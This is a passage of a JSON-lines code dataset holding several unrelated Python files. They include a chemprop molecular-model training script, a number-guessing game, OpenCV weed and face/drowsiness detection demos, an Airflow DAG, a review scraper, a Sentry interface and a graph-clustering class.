torch.zeros((len(R),))\n for idx in range(len(R)):\n if R[idx] > threshold_R:\n true_labels_R[idx] = 1\n else:\n true_labels_R = None \n \n # Build model and train\n BATCH_SIZE = 50\n NUM_TASKS = len(FLAGS.exp)\n \n torch.manual_seed(FLAGS.seed)\n if FLAGS.task_type == 'classification':\n model = models.MoleculeModel(init_lr = INIT_LR, max_lr = 10*INIT_LR,\n dataset_type = 'classification',\n final_lr = INIT_LR, depth = DEPTH,\n hidden_size = HIDDEN_SIZE, \n ffn_num_layers = FFN_NUM_LAYERS,\n dropout = DROPOUT, num_tasks = NUM_TASKS,\n device = FLAGS.device, torch_seed=FLAGS.seed)\n\n model.train_args = Namespace(\n dataset_type = 'classification',\n epochs = 30,\n warmup_epochs = 2.0,\n train_data_size = len(train_slice),\n batch_size = BATCH_SIZE,\n init_lr = INIT_LR,\n max_lr = 10*INIT_LR,\n final_lr = INIT_LR,\n depth = DEPTH,\n hidden_size = HIDDEN_SIZE, \n ffn_num_layers = FFN_NUM_LAYERS,\n dropout = DROPOUT,\n num_lrs = 1\n )\n else:\n model = models.MoleculeModel(init_lr = INIT_LR, max_lr = 10*INIT_LR,\n final_lr = INIT_LR, depth = DEPTH,\n hidden_size = HIDDEN_SIZE, \n ffn_num_layers = FFN_NUM_LAYERS,\n dropout = DROPOUT, num_tasks = NUM_TASKS,\n device = FLAGS.device, torch_seed=FLAGS.seed)\n\n model.train_args = Namespace(\n dataset_type = 'regression',\n epochs = 30,\n warmup_epochs = 2.0,\n train_data_size = len(train_slice),\n batch_size = BATCH_SIZE,\n init_lr = INIT_LR,\n max_lr = 10*INIT_LR,\n final_lr = INIT_LR,\n depth = DEPTH,\n hidden_size = HIDDEN_SIZE, \n ffn_num_layers = FFN_NUM_LAYERS,\n dropout = DROPOUT,\n num_lrs = 1,\n )\n model.optimizer = chemprop.utils.build_optimizer(model, model.train_args)\n model.scheduler = chemprop.utils.build_lr_scheduler(model.optimizer, model.train_args)\n \n # Loss function during training\n if FLAGS.task_type == 'classification':\n model.loss_fn_train = losses.loss_fn_BCE\n elif FLAGS.loss_fn_train == 'nlogprob':\n model.loss_fn_train = losses.loss_fn_nlogprob\n elif FLAGS.loss_fn_train == 'MSE': \n model.loss_fn_train = losses.loss_fn_MSE\n else:\n raise ValueError('Unknown loss function for training') \n\n # Loss function during evaluation (only used for regression models)\n model.loss_fn_eval = losses.loss_fn_nlogprob\n \n logging.info(str(model))\n with open(LOG_FILE, 'a') as lf:\n lf.write(f'{datetime.now()} INFO: ' + str(model) + '\\n')\n # Move to GPU?\n model.to(torch.device(FLAGS.device))\n logging.info(f'Moved model to {FLAGS.device}')\n lf.write(f'{datetime.now()} INFO: Moved model to {FLAGS.device}\\n')\n\n try:\n model.train_on_del(\n x, exp_counts, bead_counts, train_slice, valid_slice, true_labels=true_labels_R,\n batch_size=BATCH_SIZE, max_epochs=FLAGS.max_epochs, \n num_workers=FLAGS.num_workers,\n patience=FLAGS.patience, max_norm=FLAGS.max_norm,\n zscale=lambda epoch: 1 + 9*np.exp(-epoch/2),\n device=FLAGS.device, output_size=NUM_TASKS,\n save_path=os.path.join(SAVE_ROOT, f'best_model_trial_{trial.number}.torch'),\n log_path=LOG_FILE,\n torch_seed=FLAGS.seed,\n )\n except KeyboardInterrupt:\n logging.warning('Training interrupted by KeyboardInterrupt!')\n with open(LOG_FILE, 'a') as lf:\n lf.write(f'{datetime.now()} WARNING: Training interrupted by KeyboardInterrupt!\\n')\n \n # Check for NaN loss\n if model.best_val_loss == float('inf'):\n return model.best_val_loss\n \n # Record loss functions\n with open(os.path.join(SAVE_ROOT, f'losses_trial_{trial.number}.csv'), 'w') as fid:\n fid.write('epoch,train_loss,valid_loss\\n')\n for i in range(len(model.all_valid_losses)):\n fid.write(f'{i+1},{np.squeeze(model.all_train_losses[i])}, {np.squeeze(model.all_valid_losses[i])}\\n')\n train_losses_row_sums = np.sum(model.all_train_losses, axis=1)\n valid_losses_row_sums = np.sum(model.all_valid_losses, axis=1)\n\n # Evaluations\n def evaluate_on_slice(test_slice, slice_label='Test'):\n if model.classification:\n test_roc_auc, test_pr_auc, test_preds = model.evaluate_on_del(\n x, exp_counts, bead_counts, test_slice, batch_size=BATCH_SIZE,\n device=FLAGS.device, true_labels=true_labels_R, num_workers=FLAGS.num_workers,\n )\n \n formatted_roc_auc = ['{0:.5f}'.format(roc_auc) for roc_auc in np.squeeze(test_roc_auc, axis=0)]\n formatted_pr_auc = ['{0:.5f}'.format(pr_auc) for pr_auc in np.squeeze(test_pr_auc, axis=0)]\n logging.info(f'{slice_label} ({len(test_preds)} compounds) ROC AUC = {np.squeeze(formatted_roc_auc)}')\n logging.info(f'{slice_label} ({len(test_preds)} compounds) PR AUC = {np.squeeze(formatted_pr_auc)}')\n with open(LOG_FILE, 'a') as lf:\n lf.write(f'{datetime.now()} INFO: {slice_label} ({len(test_preds)} compounds) ROC AUC = {np.squeeze(formatted_roc_auc)}\\n')\n lf.write(f'{datetime.now()} INFO: {slice_label} ({len(test_preds)} compounds) PR AUC = {np.squeeze(formatted_pr_auc)}\\n')\n return test_roc_auc, test_pr_auc, test_preds \n else:\n test_losses, test_enrichments = model.evaluate_on_del(\n x, exp_counts, bead_counts, test_slice, batch_size=BATCH_SIZE,\n num_workers=FLAGS.num_workers, device=FLAGS.device,\n )\n\n avg_test_loss = np.sum(test_losses, axis=0) / test_losses.shape[0]\n formatted_loss = ['{0:.5f}'.format(loss) for loss in avg_test_loss]\n logging.info(f'{slice_label} ({len(test_enrichments)} compounds) average loss = {np.squeeze(formatted_loss)}')\n with open(LOG_FILE, 'a') as lf:\n lf.write(f'{datetime.now()} INFO: {slice_label} ({len(test_enrichments)} compounds) average loss = {np.squeeze(formatted_loss)}\\n')\n\n R = np.zeros((NUM_TASKS, len(test_slice)))\n R_lb = np.zeros((NUM_TASKS, len(test_slice)))\n R_ub = np.zeros((NUM_TASKS, len(test_slice)))\n for i in range(NUM_TASKS):\n _R, _R_lb, _R_ub = R_ranges(bead_counts[test_slice, i], bead_tot[i], \n exp_counts[test_slice, i], exp_tot[i])\n R[i] = _R\n R_lb[i] = _R_lb\n R_ub[i] = _R_ub\n\n test_loss_by_POI = []\n test_enrichment_by_POI = []\n for col in test_losses.T:\n test_loss_by_POI.append(col.tolist())\n for col in test_enrichments.T:\n test_enrichment_by_POI.append(col.tolist())\n test_enrichment_by_POI = np.array(test_enrichment_by_POI)\n\n accuracy_vals = np.zeros((NUM_TASKS, 3))\n for i in range(NUM_TASKS):\n low = np.mean(test_enrichment_by_POI[i] < R_lb[i])\n high = np.mean(test_enrichment_by_POI[i] > R_ub[i])\n within = np.mean((test_enrichment_by_POI[i] < R_ub[i]) & (test_enrichment_by_POI[i] > R_lb[i]))\n accuracy_vals[i] = [low, high, within]\n\n # Report fraction of enrichments within (LB, UB)\n for i, POI in enumerate(FLAGS.exp):\n logging.info(f'{POI}')\n logging.info(f'% predicted R < calculated R: {accuracy_vals[i, 0]:.3%}')\n logging.info(f'% predicted R > calculated R: {accuracy_vals[i, 1]:.3%}')\n logging.info(f'% predicted R in (R_lb, R_ub): {accuracy_vals[i, 2]:.3%}')\n with open(LOG_FILE, 'a') as lf:\n for i, POI in enumerate(FLAGS.exp):\n lf.write(f'{datetime.now()} INFO: {POI}\\n')\n lf.write(f'{datetime.now()} INFO: % predicted R < calculated R: {accuracy_vals[i, 0]:.3%}\\n')\n lf.write(f'{datetime.now()} INFO: % predicted R > calculated R: {accuracy_vals[i, 1]:.3%}\\n')\n lf.write(f'{datetime.now()} INFO: % predicted R in (R_lb, R_ub): {accuracy_vals[i, 2]:.3%}\\n\\n')\n\n return test_losses, test_enrichments, avg_test_loss, accuracy_vals\n \n # Evaluate on part of train slice\n try:\n evaluate_on_slice(train_slice[:5000], slice_label='Train subset')\n except ValueError as ve:\n logging.info(str(ve))\n with open(LOG_FILE, 'a') as lf:\n lf.write(f'{datetime.now()} WARNING: {str(ve)}\\n')\n \n # Evaluate on test set\n if model.classification:\n test_roc_auc, test_pr_auc, test_preds = evaluate_on_slice(test_slice, slice_label='Test set')\n else:\n _losses, _enrichments, avg_test_loss, accuracy_vals = evaluate_on_slice(test_slice, slice_label='Test set')\n\n # Record to results file\n if not os.path.isfile(RESULTS_FILE):\n with open(RESULTS_FILE, 'w') as fid:\n cols = ['Time (of recording)']\n for f in FLAGS.get_key_flags_for_module(sys.argv[0]):\n flag,value = f.serialize().split('=')\n cols.append(flag[2:])\n cols.append('Training losses')\n cols.append('Validation losses')\n cols.append('Test loss')\n cols.append('% predicted R in (R_lb, R_ub)')\n cols.append('Test ROC AUC')\n cols.append('Test PR AUC')\n fid.write('\\t'.join(cols) + '\\n')\n with open(RESULTS_FILE, 'a') as fid:\n cols = [str(datetime.now().now())]\n for f in FLAGS.get_key_flags_for_module(sys.argv[0]):\n flag,value = f.serialize().split('=')\n cols.append(value)\n cols.append(str(list(np.squeeze(model.all_train_losses))))\n cols.append(str(list(np.squeeze(model.all_valid_losses))))\n if model.classification:\n cols.append('')\n cols.append('')\n cols.append(str(np.squeeze(test_roc_auc)))\n cols.append(str(np.squeeze(test_pr_auc)))\n else:\n cols.append(str(np.squeeze(avg_test_loss)))\n acc_vals = accuracy_vals[:, 2]\n formatted_acc_vals = ['{0:.3%}'.format(val) for val in acc_vals]\n print(formatted_acc_vals)\n cols.append(f'{np.squeeze(formatted_acc_vals)}')\n cols.append('')\n cols.append('')\n fid.write('\\t'.join(cols) + '\\n')\n fid.close()\n \n total = time() - start\n m, s = divmod(total, 60)\n h, m = divmod(int(m), 60)\n logging.info(f'Total time for trial #{trial.number}: {h}h {m}m {s:0.2f}s\\n')\n with open(LOG_FILE, 'a') as lf:\n lf.write(f'{datetime.now()} INFO: Total time for trial #{trial.number}: {h}h {m}m {s:0.2f}s\\n\\n')\n lf.close()\n \n return model.best_val_loss\n \ndef main(argv):\n del argv\n study = optuna.create_study()\n study.optimize(objective, n_trials=FLAGS.n_trials)\n\n SAVE_ROOT = os.path.join(DATE, FLAGS.out)\n if not os.path.isdir(SAVE_ROOT):\n os.mkdir(SAVE_ROOT)\n \n SAVE_SUBFOLDER = os.path.join(SAVE_ROOT, '1_log_files')\n if not os.path.isdir(SAVE_SUBFOLDER):\n os.mkdir(SAVE_SUBFOLDER)\n \n LOG_FILE = os.path.join(SAVE_SUBFOLDER, 'run.log')\n TRIALS_LOG = os.path.join(SAVE_SUBFOLDER, 'trials.csv')\n \n trial = study.best_trial\n with open(LOG_FILE, 'a') as lf:\n print('Number of trials: {}'.format(len(study.trials)))\n lf.write(f'\\n{datetime.now()} INFO: ' + 'Number of trials: {}'.format(len(study.trials)) + '\\n')\n \n print(f'Best trial: Trial #{trial.number}')\n lf.write(f'{datetime.now()} INFO: Best trial: Trial #{trial.number}\\n') \n \n print(' Value: {}'.format(trial.value))\n lf.write(f'{datetime.now()} INFO: ' + ' Value: {}'.format(trial.value) + '\\n') \n \n print(' Params: ')\n lf.write(f'{datetime.now()} INFO: ' + ' Params: \\n')\n for key, value in trial.params.items():\n print(' {}: {}'.format(key, value))\n lf.write(f'{datetime.now()} INFO: ' + ' {}: {}'.format(key, value) + '\\n')\n lf.close()\n \n study.trials_dataframe().to_csv(TRIALS_LOG, sep='\\t', index=False)\n \n os.rename(os.path.join(SAVE_ROOT, f'losses_trial_{trial.number}.csv'), \n os.path.join(SAVE_SUBFOLDER, f'losses_trial_{trial.number}.csv'))\n os.rename(os.path.join(SAVE_ROOT, f'best_model_trial_{trial.number}.torch'), \n os.path.join(SAVE_SUBFOLDER, f'best_model_trial_{trial.number}.torch'))\n \nif __name__ == '__main__':\n app.run(main)\n logging.shutdown()\n","sub_path":"experiments/triazine_MPN.py","file_name":"triazine_MPN.py","file_ext":"py","file_size_in_byte":21050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"161531051","text":"# This is a guess the number game.\r\n\r\n# Import random library\r\nimport random\r\n\r\n# instantiate guessestaken = 0\r\nguessesTaken = 0\r\n\r\n\r\n\r\nprint('Hello! What is your name?\\n')\r\n\r\nmyName = input()\r\n\r\nnumber = random.randint(1, 10)\r\n\r\nprint('Therefore, ' + myName + ', I am thinking of a number between 1 and 10. Guess my number')\r\n\r\n\r\n# checks the number of times of guess taken\r\nwhile guessesTaken < 6:\r\n\r\n print('Take a guess\\n\\t.')\r\n\r\n guess = int(input())\r\n\r\n # add 1 after every guess\r\n guessesTaken = guessesTaken + 1\r\n\r\n #checking the conditions\r\n if guess < number:\r\n\r\n print('Your guess is too low.')\r\n\r\n\r\n\r\n if guess > number:\r\n\r\n print('Your guess is too high.')\r\n\r\n\r\n\r\n if guess == number:\r\n break\r\n\r\n# If user gets answer after first guess\r\nif guess == number:\r\n\r\n guessesTaken = str(guessesTaken)\r\n\r\n print('Great, ' + myName + '! your passed number in ' + guessesTaken + ' guesses!')\r\n\r\n# if user guess wrong answers\r\nif guess != number:\r\n number = str(number)\r\n print('Nope. The number I was thinking of was ' + number)","sub_path":"Day_2/Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"406351819","text":"import cv2\nimport numpy as np\n\nclass WEEDS:\n def __init__(self, imgPath, reSize=(250,250)):\n image = cv2.imread(imgPath)\n self.image = cv2.resize(image, reSize, interpolation = cv2.INTER_AREA)\n self.colorSpace = cv2.COLOR_BGR2LAB\n\n def displayImage(self, title=\"Image Display\", image=None):\n if(image==None):\n cv2.imshow(title, self.image)\n else:\n cv2.imshow(title, image)\n\n def waitClose(self):\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n def applyMask(self, r=55):\n maskPlant = np.zeros(self.image.shape[:2], dtype=\"uint8\")\n cv2.circle(maskPlant, (125, 65), r, 255, -1)\n cv2.circle(maskPlant, (225, 75), r, 255, -1)\n cv2.circle(maskPlant, (320, 35), r, 255, -1)\n cv2.circle(maskPlant, (140, 245), r, 255, -1)\n cv2.circle(maskPlant, (255, 245), r, 255, -1)\n cv2.circle(maskPlant, (365, 210), r, 255, -1)\n\n self.image = cv2.bitwise_not(self.image, self.image, mask=maskPlant)\n\n def applyBlur(self, strong=(3,3)):\n self.image = cv2.GaussianBlur(imgB, strong, 0)\n\n def getImage(self):\n return self.image\n\n def extractWeeds_all(self, b_threshold=80, a_threshold=80):\n zeros = np.zeros(self.image.shape[:2], dtype = \"uint8\")\n\n imgLAB = cv2.cvtColor(self.image, self.colorSpace)\n (L, A, B) = cv2.split(imgLAB)\n\n (T_weeds_b, thresh_weeds_b) = cv2.threshold(B, b_threshold, 255, cv2.THRESH_BINARY)\n (T_weeds_a, thresh_weeds_a) = cv2.threshold(A, a_threshold, 255, cv2.THRESH_BINARY)\n imgRGB = cv2.merge([zeros, thresh_weeds_b, thresh_weeds_a])\n self.image = imgRGB\n\n def countPlantArea(self):\n image = self.image\n width = image.shape[1]\n height = image.shape[0]\n greenArea = 0.0\n \n for pixel_w in range(0, width, 1):\n for pixel_h in range(0, height, 1):\n (b, g, r) = image[pixel_h, pixel_w]\n if((b+g+r)>0):\n greenArea += 1 \n\n plantArea = greenArea / (width*height)\n ratio = str(int(plantArea * 100)) + \"%\"\n cv2.putText(image, ratio, (width-150, 50), cv2.FONT_HERSHEY_SIMPLEX, 2, (255, 1, 126), 5)\n self.image = image\n\n def extractWeeds(self, threshold=80, channel=\"B\"):\n zeros = np.zeros(self.image.shape[:2], dtype = \"uint8\")\n\n imgLAB = cv2.cvtColor(self.image, self.colorSpace)\n (L, A, B) = cv2.split(imgLAB)\n\n if(channel==\"B\"):\n selectedChannel = B\n elif(channel==\"L\"):\n selectedChannel = L\n elif(channel==\"A\"):\n selectedChannel = A\n\n (T_weeds, thresh_weeds) = cv2.threshold(selectedChannel, threshold, 255, cv2.THRESH_BINARY)\n imgRGB = cv2.merge([zeros, thresh_weeds, zeros])\n self.image = imgRGB\n #imgGray = cv2.cvtColor(imgRGB, cv2.COLOR_BGR2GRAY)\n","sub_path":"lib/libFarm.py","file_name":"libFarm.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"348090939","text":"from auc.baseusecase import BaseUseCase\nfrom robot.api import logger\nfrom conf.restConstants import *\nimport requests as req\n\n\nclass MiddlewareEnableBackup(BaseUseCase):\n def test_execute_middleware_enable_backup(self):\n \"\"\"\n Function to enable the filesystem backup for a given VM.\n\n Args:\n tenant_id (mandatory): String\ttenant uuid in xstream\n vm_id (mandatory): String vm uuid in xstream\n hostname (mandatory): String hostname of the vm\n retention_days (mandatory): Int no. of retention days\n callback_url (mandatory): String\n Returns:\n Function returns Status Code from the REST API response.\n Following status codes can be returned\n 200: OK\n 404: NOT FOUND\n 401: UNAUTHORIZED\n 500: INTERNAL SERVER ERROR\n \"\"\"\n enable_backup_data = {'TenantID': self.ctx_in['tenant_id'],\n 'VirtualMachineID': self.ctx_in['vm_id'],\n 'VirtualMachineHostName': self.ctx_in['hostname'],\n 'RetentionDays': self.ctx_in['retention_days'],\n 'Callback': self.ctx_in['callback_url']\n }\n try:\n enable_backup_resp = req.post(MIDDLEWARE_ENABLE_BACKUP.format(self.ctx_in['mw_service_host']),\n json=enable_backup_data,\n headers=MIDDLEWARE_SERVICE_HEADER)\n self.ctx_out = True\n except Exception as e:\n logger.info(\"Exception occurred while calling Enable Backup API. \\n \"\n \"Backup enabling did not happen.\\nException: %s\" % e)\n self.ctx_out = False\n return 0\n\n logger.info(\"Status Code = %s\" % enable_backup_resp.status_code)\n logger.info(\"Message = %s\" % enable_backup_resp.text)\n self.ctx_out = enable_backup_resp.status_code\n return enable_backup_resp.status_code\n\n def run_test(self):\n sc = self.test_execute_middleware_enable_backup()\n return sc\n\n def _finalize_context(self):\n assert self.ctx_out == 200, 'Could not enable backup'\n","sub_path":"automation_framework/auc/middleware_enable_backup/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"468088457","text":"\"\"\"trt_mtcnn.py\n\nThis script demonstrates how to do real-time face detection with\nCython wrapped TensorRT optimized MTCNN engine.\n\"\"\"\n\nimport sys\nimport time\nimport argparse\n\nimport cv2\nfrom utils.camera import add_camera_args, Camera\nfrom utils.display import open_window, set_display, show_fps\nfrom utils.mtcnn import TrtMtcnn\nfrom keras.models import load_model\nimport numpy as np\n\nemotion_dict = {0: 'angry', 1: 'happy', 2: 'neutral', 3: 'sad'}\nsleep_dict = {0: \"awake\", 1: \"drowsy\"}\n\nmodel = load_model(\"./whole_model.hdf5\")\nWINDOW_NAME = 'TrtMtcnnDemo'\nBBOX_COLOR = (0, 255, 0) # green\ncount = 1\nsleep_prev = str(\"awake\")\n\ndef parse_args():\n \"\"\"Parse input arguments.\"\"\"\n desc = ('Capture and display live camera video, while doing '\n 'real-time face detection with TrtMtcnn on Jetson '\n 'Nano')\n parser = argparse.ArgumentParser(description=desc)\n parser = add_camera_args(parser)\n parser.add_argument('--minsize', type=int, default=40,\n help='minsize (in pixels) for detection [40]')\n args = parser.parse_args()\n return args\n\n\ndef show_faces(img, boxes, landmarks):\n \"\"\"Draw bounding boxes and face landmarks on image.\"\"\"\n global sleep_prev\n global count\n img1 = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n for bb, ll in zip(boxes, landmarks):\n x1, y1, x2, y2 = int(bb[0]), int(bb[1]), int(bb[2]), int(bb[3])\n #################################\n roi_color = img1[y1:y2, x1:x2, :]\n cropped_img = np.expand_dims(cv2.resize(roi_color, (224, 224)), 0)\n prediction2 = model.predict(cropped_img)\n sleep = prediction2[0]\n emotion = prediction2[1]\n print(emotion_dict[int(np.argmax(emotion))] , \"\\n\" , sleep_dict[int(np.argmax(sleep))] )\n ################################\n cv2.rectangle(img, (x1, y1), (x2, y2), (206, 174, 17), 1)\n sleep = sleep_dict[int(np.argmax(prediction2[0]))]\n emotion = emotion_dict[int(np.argmax(prediction2[1]))]\n\n if sleep == \"drowsy\" and sleep == sleep_prev:\n count = count+1\n sleep_prev = sleep\n if count > 10:\n cv2.rectangle(img, (x2 + 20, y1+ 40), (x2 + 120, y1 + 55), (28, 13, 191), 13)\n cv2.putText(img, \"ALERT!!\", (x2 + 32, y1 + 54), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255), 1,\n cv2.LINE_AA)\n else:\n sleep_prev = sleep\n count = 1\n\n cv2.rectangle(img, (x2 + 20, y1 + 5), (x2 + 120, y1 + 20), (206, 174, 17), 13)\n cv2.putText(img, emotion, (x2 + 32, y1 + 18), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255), 1,\n cv2.LINE_AA)\n\n if sleep == \"awake\":\n cv2.rectangle(img, (x2 + 20, y1 + 40), (x2+ 120, y1 + 55), (206, 174, 17), 13)\n cv2.putText(img, sleep, (x2 + 32, y1 + 53), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255), 1,\n cv2.LINE_AA)\n elif sleep == \"drowsy\" and count <= 10:\n cv2.rectangle(img, (x2 + 20, y1 + 40), (x2 + 120, y1 + 55), (14, 88, 235), 13)\n cv2.putText(img, sleep, (x2 + 32, y1 + 53), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255), 1,\n cv2.LINE_AA)\n return img\n\n\ndef loop_and_detect(cam, mtcnn, minsize):\n \"\"\"Continuously capture images from camera and do face detection.\"\"\"\n full_scrn = False\n fps = 0.0\n tic = time.time()\n while True:\n if cv2.getWindowProperty(WINDOW_NAME, 0) < 0:\n break\n img = cam.read()\n if img is not None:\n dets, landmarks = mtcnn.detect(img, minsize=minsize)\n print('{} face(s) found'.format(len(dets)))\n img = show_faces(img, dets, landmarks)\n img = show_fps(img, fps)\n cv2.imshow(WINDOW_NAME, img)\n toc = time.time()\n curr_fps = 1.0 / (toc - tic)\n # calculate an exponentially decaying average of fps number\n fps = curr_fps if fps == 0.0 else (fps*0.95 + curr_fps*0.05)\n tic = toc\n key = cv2.waitKey(1)\n if key == 27: # ESC key: quit program\n break\n elif key == ord('F') or key == ord('f'): # Toggle fullscreen\n full_scrn = not full_scrn\n set_display(WINDOW_NAME, full_scrn)\n\n\ndef main():\n args = parse_args()\n cam = Camera(args)\n cam.open()\n if not cam.is_opened:\n sys.exit('Failed to open camera!')\n\n mtcnn = TrtMtcnn()\n\n cam.start()\n open_window(WINDOW_NAME, args.image_width, args.image_height,\n 'Camera TensorRT MTCNN Demo for Jetson TX2')\n loop_and_detect(cam, mtcnn, args.minsize)\n\n cam.stop()\n cam.release()\n cv2.destroyAllWindows()\n\n del(mtcnn)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Face_Detection_Models/MTCNN/demo_VggFace_mtcnn_jetsontx2.py","file_name":"demo_VggFace_mtcnn_jetsontx2.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"241517356","text":"from datetime import timedelta\n\nimport airflow\nfrom airflow.models import DAG\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.python_operator import PythonOperator\n\nargs = {\n 'owner': 'Airflow',\n 'start_date': airflow.utils.dates.days_ago(2),\n}\n\ndag = DAG(\n dag_id='dag_2_training_id',\n default_args=args,\n schedule_interval=None,\n dagrun_timeout=timedelta(minutes=60),\n)\n\ndef print_context(execution_date, **context):\n print(execution_date)\n\nPythonOp = PythonOperator(\n task_id='PythonOp',\n provide_context=True,\n python_callable=print_context,\n dag=dag,\n)\n\nBashOp_1 = BashOperator(\n task_id='BashOp_1',\n bash_command='sleep 1',\n dag=dag,\n)\n\nBashOp_2 = BashOperator(\n task_id='BashOp_2',\n bash_command='sleep 5',\n dag=dag,\n)\n\nBashOp_3 = BashOperator(\n task_id='BashOp_3',\n bash_command='sleep 10',\n dag=dag,\n)\n\nDummyOp = DummyOperator(\n task_id='DummyOp',\n dag=dag,\n)\n\nPythonOp >> [BashOp_1,BashOp_2,BashOp_3] >> DummyOp \n","sub_path":"dags/dag_2_training.py","file_name":"dag_2_training.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"353550472","text":"import requests\nimport dryscrape\nfrom bs4 import BeautifulSoup\n\ndef get_drysoup(url):\n\tprint(url)\n\tsession = dryscrape.Session()\n\tsession.set_timeout(60)\n\tsession.visit(url)\n\tpage = session.body()\n\tsoup = BeautifulSoup(page,'html.parser')\n\treturn soup\ndef get_soup(url):\n\tprint(url)\n\t#page = urllib.request.urlopen(url)\n\tpage = requests.get(url)\n\tsoup = BeautifulSoup(page.text,'html.parser')\n\treturn soup\n\t\n\nclass ConsumerAffairs(object):\n\n\tdef __init__(self):\n\t\tself.urls = []\n\n\tdef start_scraping(self, searchterm):\n\t\turl = \"https://www.consumeraffairs.com/search.html?q=\"+searchterm\n\t\tlist = []\n\t\tself.getReviews(url, list)\n\t\tprint(\"****************************************************\",len(list))\n\t\treturn list\t\t\n\n\tdef getReviews(self, url, list):\n\t\tsoup = get_drysoup(url)\n\t\taddr = self.getAddress(soup)\n\t\tres = soup.find(id=\"___gcse_0\")\n\t\t#print(res.findAll(\"a\",{\"class\":\"gs-title\"}))\n\t\tfor item in res.findAll(\"a\",{\"class\":\"gs-title\"}):\n\t\t\td_url = item['href']\n\t\t\tif d_url in self.urls:\n\t\t\t\tcontinue\n\t\t\telse:\t\t\n\t\t\t\tself.urls.append(d_url)\t\n\t\t\t\tdetail = get_soup(d_url)\n\t\t\treviews = detail.findAll(\"div\",{\"class\":\"review--user-post\"})\n\t\t\tprint(len(reviews))\n\t\t\tfor r in reviews:\n\t\t\t\tdict = {}\n\t\t\t\tdict[\"name\"] = r.find(\"span\",{\"class\":\"review__author-name\"}).find(text=True)\n\t\t\t\tdict[\"date\"] = r.find(\"span\",{\"class\":\"review__post-date\"}).find(text=True)\n\t\t\t\tdict[\"title\"] = \"\"\n\t\t\t\tdict[\"content\"] = r.find(\"div\",{\"class\":\"review__body\"}).find('p').find(text=True, recursive=True)\n\t\t\t\tdict[\"address\"] = \"\"\n\t\t\t\tlist.append(dict)\n\t\t\t\t\t\t\n\t\tnextPage = self.getUrl(soup)\n\t\tif nextPage is not None:\n\t\t\tself.getReviews(nextPage, list)\n\t\t\t\t\n\t\tprint(list)\n\t\treturn list\n\n\n\tdef getAddress(self, soup):\n\t\ttry:\n\t\t\treturn \"\\n\".join(soup.find('div',{'itemprop':'address'}).stripped_strings)\n\t\texcept:\n\t\t\treturn \"\"\n\n\tdef getUrl(self, soup):\n\t\tif soup.find(\"div\",{\"class\":\"review--user-post\"}) is not None:\n\t\t\tprint(getUrl)\n\t\t\treturn \"https://www.consumeraffairs.com/\"+soup.find('a',{'class':'next'})['href']\n\t\telse:\n\t\t\treturn None\n\n\n","sub_path":"apps/mentions/scraping/consumeraffairs.py","file_name":"consumeraffairs.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"34507442","text":"from __future__ import absolute_import\n\nfrom sentry.interfaces.base import Interface\nfrom sentry.interfaces.stacktrace import Stacktrace\nfrom sentry.utils.safe import trim\n\n__all__ = ('Threads',)\n\n\nclass Threads(Interface):\n score = 1900\n\n @classmethod\n def to_python(cls, data):\n threads = []\n\n for thread in data.get('values') or ():\n stacktrace = thread.get('stacktrace')\n if stacktrace is not None:\n stacktrace = Stacktrace.to_python(stacktrace,\n slim_frames=True)\n threads.append({\n 'stacktrace': stacktrace,\n 'id': trim(thread.get('id'), 40),\n 'crashed': bool(thread.get('crashed')),\n 'current': bool(thread.get('current')),\n 'name': trim(thread.get('name'), 200),\n })\n\n return cls(values=threads)\n\n def to_json(self):\n def export_thread(data):\n rv = {\n 'id': data['id'],\n 'current': data['current'],\n 'crashed': data['crashed'],\n 'name': data['name'],\n 'stacktrace': None,\n }\n if data['stacktrace']:\n rv['stacktrace'] = data['stacktrace'].to_json()\n return rv\n\n return {\n 'values': [export_thread(x) for x in self.values],\n }\n\n def get_api_context(self, is_public=False):\n def export_thread(data):\n rv = {\n 'id': data['id'],\n 'current': data['current'],\n 'crashed': data['crashed'],\n 'name': data['name'],\n 'stacktrace': None,\n }\n if data['stacktrace']:\n rv['stacktrace'] = data['stacktrace'].get_api_context(\n is_public=is_public)\n return rv\n\n return {\n 'values': [export_thread(x) for x in self.values],\n }\n\n def get_path(self):\n return 'threads'\n","sub_path":"src/sentry/interfaces/threads.py","file_name":"threads.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"567994059","text":"import networkx as nx\nimport numpy as np\nimport sys\nfrom ba.UtilityClasses import ColType\nimport time\n\nclass GraphClustering:\n\n def __init__(self):\n self.preset_number_of_clusters = None\n self.nearest_neighbour_indices = None\n self.border_points = None\n self.connection_matrix_ = None\n self.sub_connection_matrix_ = None\n self.edges_ = None\n self.graph_ = None\n self.sub_graphs_ = None\n self.graph_clustering_name_ = None\n\n def perform_sub_graph_clustering(self, data_frame, nearest_neighbour_indices, border_points):\n self.nearest_neighbour_indices = nearest_neighbour_indices\n self.border_points = border_points\n self.connection_matrix_ = self._compute_connection_matrix(nearest_neighbour_indices)\n self.sub_connection_matrix_ = self._compute_sub_connection_matrix(border_points, self.connection_matrix_)\n self.edges_ = 